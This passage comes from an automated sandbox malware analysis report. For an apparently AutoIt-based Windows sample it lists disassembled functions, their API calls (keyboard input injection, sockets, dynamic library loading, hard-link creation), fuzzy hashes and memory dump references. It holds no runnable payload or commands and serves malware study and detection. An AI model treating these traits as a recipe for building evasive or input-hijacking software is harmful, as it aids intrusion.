                                                            • Opcode Fuzzy Hash: b87e6eea8a6d813068fe689a199b6ae8b7893156b11758b2bae56c01632c0666
                                                            • Instruction Fuzzy Hash: C6112372200308BEEF205F60EC05FEB7BA9EF88B65F150129FE41A6190D272E811CB30
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00D569A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00D569B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: @U=u$edit
                                                            • API String ID: 2978978980-590756393
                                                            • Opcode ID: c3ffc656b4532f77e88b71cbb2eb97bdae8e1d8146eb6584be53d11021024200
                                                            • Instruction ID: 1a25caef5316d8cebdf8f60a99f5f300f81999678252ade2d86e79d4a517dfc7
                                                            • Opcode Fuzzy Hash: c3ffc656b4532f77e88b71cbb2eb97bdae8e1d8146eb6584be53d11021024200
                                                            • Instruction Fuzzy Hash: 74115B71100204ABEF108F64DC40AAB37A9EB053B6F944624FDA5972E0C731DC589F70
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D28E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 372448540-2258501812
                                                            • Opcode ID: 82c8766a068d54255e9ee89273bb03ba546f693837cfc1e4a5abb5a637ed9848
                                                            • Instruction ID: 5ee3a42b928c3c51eace4c63dd225eaabd7a4740553cf6350753f777f9880f72
                                                            • Opcode Fuzzy Hash: 82c8766a068d54255e9ee89273bb03ba546f693837cfc1e4a5abb5a637ed9848
                                                            • Instruction Fuzzy Hash: 7E01B571606229AB8B14EBA4DC558FE7369EF15320B140A1AB871573E1EE329808E670
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D28D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 372448540-2258501812
                                                            • Opcode ID: ada40b59117f6c423ca025889aa9b6f6f6f6a703e5d6ae13b7a517551216f79e
                                                            • Instruction ID: 116cced4234bdfff768a31ff1f4a172cb8566d167c69dda5ade9ff9d51a7db5f
                                                            • Opcode Fuzzy Hash: ada40b59117f6c423ca025889aa9b6f6f6f6a703e5d6ae13b7a517551216f79e
                                                            • Instruction Fuzzy Hash: E701F271A42119AFCB14EBA4D952EFF73A8DF25300F14001AB942672E1EE219E0CE671
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D28DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 372448540-2258501812
                                                            • Opcode ID: 0856e43b6b1d41d81499384fe69106634c969e160f2f1c723f7101cc980dc3c7
                                                            • Instruction ID: b3893be9f409933ea5e7adbe58a6d8151bbfe8af38a3a87c9ec6afe132050401
                                                            • Opcode Fuzzy Hash: 0856e43b6b1d41d81499384fe69106634c969e160f2f1c723f7101cc980dc3c7
                                                            • Instruction Fuzzy Hash: 2D01F271A46219ABCB10EBA8D952EFE73A8DF21300F140016B841A3292EE218E0CE271
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,00D957B0,00D5D809,000000FC,?,00000000,00000000,?,?,?,00D0B969,?,?,?,?,?), ref: 00D5ACD1
                                                            • GetFocus.USER32 ref: 00D5ACD9
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • SendMessageW.USER32(0140EE90,000000B0,000001BC,000001C0), ref: 00D5AD4B
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$Long$FocusForegroundMessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3601265619-2594219639
                                                            • Opcode ID: fdbf940b0399b0de874be9df0f50148cef9a07597de3076aa94c62603d2b3b1a
                                                            • Instruction ID: 82857f0b106141088f5b1f040bded73b53e5c939b2accc5cad5b6558e42de80e
                                                            • Opcode Fuzzy Hash: fdbf940b0399b0de874be9df0f50148cef9a07597de3076aa94c62603d2b3b1a
                                                            • Instruction Fuzzy Hash: 400148312017109FCB15AB28D894A5577E5EB49322B18027AFD15CB3B5E771AC468B61
                                                            APIs
                                                              • Part of subcall function 00CE603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CE6051
                                                            • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00CE607F
                                                            • GetParent.USER32(?), ref: 00D20D46
                                                            • InvalidateRect.USER32(00000000,?,00CE3A4F,?,00000000,00000001), ref: 00D20D4D
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$InvalidateParentRectTimeout
                                                            • String ID: @U=u
                                                            • API String ID: 3648793173-2594219639
                                                            • Opcode ID: b87c4ec63fd855c0beb6f103b8f1596fe459c213df6ae028dc81f53020fcc2a8
                                                            • Instruction ID: 64fa9ee217b03d60c635ee3fcc2a02c7adceda2a26888c6662e1c5fe9983cf25
                                                            • Opcode Fuzzy Hash: b87c4ec63fd855c0beb6f103b8f1596fe459c213df6ae028dc81f53020fcc2a8
                                                            • Instruction Fuzzy Hash: FEF0A0301103A0FBEF201F62DC09F967B99AB61385F245428F9419E1A1C6B26840AB64
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CD4BD0,?,00CD4DEF,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CD4C23
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: e7037951bfcd86f3b82275a2103d59f0b0e71d9ce9110490209efe7ca61c59fb
                                                            • Instruction ID: 91e32f09114677cb0b053f8a0b3b7f855ba3a9e6b8c750718971e6ebff361c76
                                                            • Opcode Fuzzy Hash: e7037951bfcd86f3b82275a2103d59f0b0e71d9ce9110490209efe7ca61c59fb
                                                            • Instruction Fuzzy Hash: DCD01231511B13CFD7206F71D948A07B6D5EF09352B118C3A9995DA650E7B0D484CB61
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CD4B83,?), ref: 00CD4C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CD4C56
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 206c9f690399eebff35c9a062eaa2769bf0d55a8befe3bfe5d22702bebe6df83
                                                            • Instruction ID: 9b598bb472e6c18ce046db12ef53e5668b248d50f71e57e30447b94f04b5b8f0
                                                            • Opcode Fuzzy Hash: 206c9f690399eebff35c9a062eaa2769bf0d55a8befe3bfe5d22702bebe6df83
                                                            • Instruction Fuzzy Hash: E2D01271510B13CFD7245F31D908A0677D4AF05352B11883ADAA5DA664E670D484C660
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00D51039), ref: 00D50DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D50E07
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: d5fcffb1dcc8453a35d2869437c166665f7b9f39625d3023a8192ee609b5c626
                                                            • Instruction ID: fb13823a6c30505696480de593f2bab301585ece9e44998f0981893c2860b416
                                                            • Opcode Fuzzy Hash: d5fcffb1dcc8453a35d2869437c166665f7b9f39625d3023a8192ee609b5c626
                                                            • Instruction Fuzzy Hash: FED01271510712CFD7216F75D809656B6D5AF04353F198C7DACC5D6250D7B0D494C770
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00D48CF4,?,00D5F910), ref: 00D490EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00D49100
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: ce62def61d6dfe63ef2aa3a15e1014e156bb12e8804d69dc8f371b90b5a1d728
                                                            • Instruction ID: e74b3b770381adac6ecb4163c74a12f4395723a6a00203ce0e86d97a3964c5e0
                                                            • Opcode Fuzzy Hash: ce62def61d6dfe63ef2aa3a15e1014e156bb12e8804d69dc8f371b90b5a1d728
                                                            • Instruction Fuzzy Hash: 57D01235510713CFDB209F31D818907B6D4AF05352B1588399985DA650E670C484C7B0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 246be71a007ea264768bee5f7c572799c12ea3fc581c7b4025f225cf8cbc58f6
                                                            • Instruction ID: 5bdf470df5347ee00dc6e2dbbab0dc7493cd44e4e784edd0e978c0dfdc74c8b2
                                                            • Opcode Fuzzy Hash: 246be71a007ea264768bee5f7c572799c12ea3fc581c7b4025f225cf8cbc58f6
                                                            • Instruction Fuzzy Hash: 80D01279805219FAC7009790A88C8F9737CA708301F140552F742D2280E661C7D4E631
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ada95613efffbd0db45d009835c6d8e53c60a7ca85a710ad6492d4d6139fba77
                                                            • Instruction ID: 9875bcbe04769e127aef04aae2fc14425828009a27dec5b24c7cbb424b9d9330
                                                            • Opcode Fuzzy Hash: ada95613efffbd0db45d009835c6d8e53c60a7ca85a710ad6492d4d6139fba77
                                                            • Instruction Fuzzy Hash: 1FC18174A04226EFCB24DF94D884EAEBBB5FF58718B144598E805DB251D730ED41DBA0
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 00D4E0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 00D4E101
                                                              • Part of subcall function 00D4D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00D4D7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00D4E301
                                                            • _memmove.LIBCMT ref: 00D4E314
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: cd4b205edce1ddf5dc87478932bd2d919ef1f907f18e1ece72476261b1f76658
                                                            • Instruction ID: c29a8dbe36636becadb0988b87ffa0c06b41c509dfa3a92525321cfed3d612d1
                                                            • Opcode Fuzzy Hash: cd4b205edce1ddf5dc87478932bd2d919ef1f907f18e1ece72476261b1f76658
                                                            • Instruction Fuzzy Hash: 99C16971A083019FC704DF28C480A6ABBE4FF89714F14896EF9999B351D771E946CFA2
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00D480C3
                                                            • CoUninitialize.OLE32 ref: 00D480CE
                                                              • Part of subcall function 00D2D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2D5D4
                                                            • VariantInit.OLEAUT32(?), ref: 00D480D9
                                                            • VariantClear.OLEAUT32(?), ref: 00D483AA
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 9b8f7589febc8057b2cb67d5e4e6e15273033a33b4c3c8ab0b29224c7a0da129
                                                            • Instruction ID: f07a0bd7b8873a51d17ef9289e822764c4435af09b394dddc259d9ec5e33e76b
                                                            • Opcode Fuzzy Hash: 9b8f7589febc8057b2cb67d5e4e6e15273033a33b4c3c8ab0b29224c7a0da129
                                                            • Instruction Fuzzy Hash: 1FA159796047019FCB10EF54C885A2EB7E4FF89754F144449FA9A9B3A1CB30EC05EBA6
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D62C7C,?), ref: 00D276EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D62C7C,?), ref: 00D27702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00D5FB80,000000FF,?,00000000,00000800,00000000,?,00D62C7C,?), ref: 00D27727
                                                            • _memcmp.LIBCMT ref: 00D27748
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID:
                                                            • API String ID: 314563124-0
                                                            • Opcode ID: b90f0253323225050f41536fc131beadcf8c474679e3605a7d02c5f13a62ffa3
                                                            • Instruction ID: 2db189d8920c37c402916e7ea473f146e218f0551318d7e224c6efb8af08d253
                                                            • Opcode Fuzzy Hash: b90f0253323225050f41536fc131beadcf8c474679e3605a7d02c5f13a62ffa3
                                                            • Instruction Fuzzy Hash: D1812C71A00119EFCB14DFA8C984EEEB7B9FF89315F244598E505AB250DB71AE06CB60
                                                            APIs
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: 47cfd9663f458a013d73b1ab57c06be593ec78d906f33c98b5229fb5f95cbf2b
                                                            • Instruction ID: dfad8a2d3918e5f6b0a3a99ebd0d897b3eb38b2179043e2e20207db314f498b6
                                                            • Opcode Fuzzy Hash: 47cfd9663f458a013d73b1ab57c06be593ec78d906f33c98b5229fb5f95cbf2b
                                                            • Instruction Fuzzy Hash: 8C51C2747003119ACB24AF65E8A1A3AB3E5EF64318F24D81FE596DB291DF30DC809B31
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00D469D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D469E1
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D46A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D46A51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: f43cc4f9a40f0189ea2a83635d942d60f20b0319418c8fda98b00343f3160cec
                                                            • Instruction ID: 9c1cc78722187f377b2bca653e55f5afd053a522664d775cfa0b36f20a7f9729
                                                            • Opcode Fuzzy Hash: f43cc4f9a40f0189ea2a83635d942d60f20b0319418c8fda98b00343f3160cec
                                                            • Instruction Fuzzy Hash: 9C417E75640300AFEB60AF68DC86F2A77A9DB05B14F048419FA59AF3D2DA709D009BA1
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00D5F910), ref: 00D464A7
                                                            • _strlen.LIBCMT ref: 00D464D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: dd960e39780510f33caabaa1841d7d45b94a7e78084c7cb76069fa80b25b76ea
                                                            • Instruction ID: 80c30f0d2653621b1ac540d98348d510ae7dbd30ad858045b55994165a3430e4
                                                            • Opcode Fuzzy Hash: dd960e39780510f33caabaa1841d7d45b94a7e78084c7cb76069fa80b25b76ea
                                                            • Instruction Fuzzy Hash: BE419575900204ABCB14FBA8DC95EBEB7A9EF05310F148156F91A9B396EB30ED04DB71
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D3B89E
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00D3B8C4
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D3B8E9
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D3B915
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: f8a1f3933781e4022f1afaad5306638870d4f9c2fc03a60789b3f7b1d977e0a8
                                                            • Instruction ID: 104d7e0f953b36800adfefc982e6c4dd8c0fbdb2211c9464d4d1ce2c6c2f3713
                                                            • Opcode Fuzzy Hash: f8a1f3933781e4022f1afaad5306638870d4f9c2fc03a60789b3f7b1d977e0a8
                                                            • Instruction Fuzzy Hash: 06411D39A00650DFCB11EF15C445A59BBE1EF49720F19809AEE4A9F362CB34FD01EBA1
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 00D5AB60
                                                            • GetWindowRect.USER32(?,?), ref: 00D5ABD6
                                                            • PtInRect.USER32(?,?,00D5C014), ref: 00D5ABE6
                                                            • MessageBeep.USER32(00000000), ref: 00D5AC57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 85daa392cd5d1a2bdef3dab71d16d4a717d6dcbb525413382330073b9ba2d340
                                                            • Instruction ID: 50837598c1531ac361ccfe8ba1062b6a1fc6d772593843fecf35c0b7af7f02cd
                                                            • Opcode Fuzzy Hash: 85daa392cd5d1a2bdef3dab71d16d4a717d6dcbb525413382330073b9ba2d340
                                                            • Instruction Fuzzy Hash: 4E4138346002299FCF12DF5CD884A697BF5FF49312F1882A9EC55DB364D730A8498BA2
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00D30B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00D30B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00D30BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00D30BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 7f819dcb578ac92ba6d3f9c9230917136bbb336a18522c3ff59f1db8f29c3995
                                                            • Instruction ID: df303c6245315037e74a3d64e74aa6c195fd5d159924dcef9c3ff3c7a0fcd479
                                                            • Opcode Fuzzy Hash: 7f819dcb578ac92ba6d3f9c9230917136bbb336a18522c3ff59f1db8f29c3995
                                                            • Instruction Fuzzy Hash: 87312470A40318AEFB308B29CC25BFAFFB9AB45319F0C426AE4D1961D1D3B589849775
                                                            APIs
                                                            • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00D30C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D30C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D30CE1
                                                            • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00D30D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 33ee3b5ebef5bb839f944fefb8a4ffd462baa237c32e579263958b632e33ae8b
                                                            • Instruction ID: 73a9f76f54edd6b45cb5db14defa65502ec9af77b8f734ee8a6925607270b852
                                                            • Opcode Fuzzy Hash: 33ee3b5ebef5bb839f944fefb8a4ffd462baa237c32e579263958b632e33ae8b
                                                            • Instruction Fuzzy Hash: 33314430900318AEFF308B65D824BFEBFBAAB45321F0C976AE481925D1D3759995C7B1
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D061FB
                                                            • __isleadbyte_l.LIBCMT ref: 00D06229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D06257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D0628D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
